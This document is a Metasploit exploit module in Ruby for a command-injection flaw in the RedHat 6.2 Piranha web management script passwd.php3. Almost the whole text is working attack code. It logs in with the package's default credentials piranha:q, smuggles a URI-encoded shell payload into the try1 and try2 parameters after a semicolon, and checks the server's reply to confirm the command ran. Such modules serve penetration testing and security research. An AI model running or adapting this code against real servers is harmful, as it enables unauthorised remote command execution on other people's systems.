RedHat Piranha Virtual Server Package passwd.php3 Arbitrary Command Execution

`##  
# $Id: piranha_passwd_exec.rb 8497 2010-02-14 20:27:24Z patrickw $  
##  
  
##  
# This file is part of the Metasploit Framework and may be subject to  
# redistribution and commercial restrictions. Please see the Metasploit  
# Framework web site for more information on licensing and terms of use.  
# http://metasploit.com/framework/  
##  
  
  
require 'msf/core'  
  
  
class Metasploit3 < Msf::Exploit::Remote  
Rank = ExcellentRanking  
  
include Msf::Exploit::Remote::HttpClient  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'RedHat Piranha Virtual Server Package passwd.php3 Arbitrary Command Execution',  
'Description' => %q{  
This module abuses two flaws - a metacharacter injection vulnerability in the  
HTTP management server of RedHat 6.2 systems running the Piranha  
LVS cluster service and GUI (rpm packages: piranha and piranha-gui).  
The vulnerability allows an authenticated attacker to execute arbitrary  
commands as the Apache user account (nobody) within the  
/piranha/secure/passwd.php3 script. The package installs with a default  
user and password of piranha:q which was exploited in the wild.  
},  
'Author' => [ 'patrick' ],  
'License' => MSF_LICENSE,  
'Version' => '$Revision: 8497 $',  
'References' =>  
[  
[ 'CVE', '2000-0322' ],  
[ 'CVE', '2000-0248' ],  
[ 'OSVDB', '1300' ],  
[ 'OSVDB', '289' ],  
[ 'BID', '1149' ],  
[ 'BID', '1148' ],  
],  
'Platform' => ['unix'],  
'Arch' => ARCH_CMD,  
'Privileged' => false,  
'Payload' =>  
{  
'Space' => 1024,  
'DisableNops' => true,  
'Compat' =>  
{  
'PayloadType' => 'cmd',  
'RequiredCmd' => 'generic',  
# inetd works, but not on RH6.2 syntax wise. telnet also, but /dev/tcp not found.  
# others use single quotes which apache/bash/htpasswd escapes (\) and breaks. sigh!  
}  
},  
'Targets' =>  
[  
[ 'Automatic (piranha-gui-0.4.12-1.i386.rpm)', { }]  
],  
'DefaultTarget' => 0))  
  
register_options(  
[  
Opt::RPORT(80),  
OptString.new('BasicAuthUser', [true, 'The HTTP username to specify for basic authentication', 'piranha']),  
OptString.new('BasicAuthPass', [true, 'The HTTP password to specify for basic authentication', 'q']),  
], self.class)  
end  
  
def exploit  
cmd = Rex::Text.uri_encode(payload.encoded, 'hex-normal')  
str = "/piranha/secure/passwd.php3?try1=q+;#{cmd}&try2=q+;#{cmd}&passwd=ACCEPT"  
print_status("Sending GET request with encoded command line...")  
res = send_request_raw({  
'uri' => str,  
'method' => 'GET',  
'headers' => {  
'content-type' => 'application/x-www-form-urlencoded',  
},  
}, 3)  
  
if (res.code == 401)  
print_error("401 Authorization Required! Our BasicAuthUser and BasicAuthPass credentials not accepted!")  
elsif (res.code == 200 and res.body =~ /The passwords you supplied match/)  
print_status("Command successfully executed (according to the server).")  
end  
  
end  
  
end  
  
`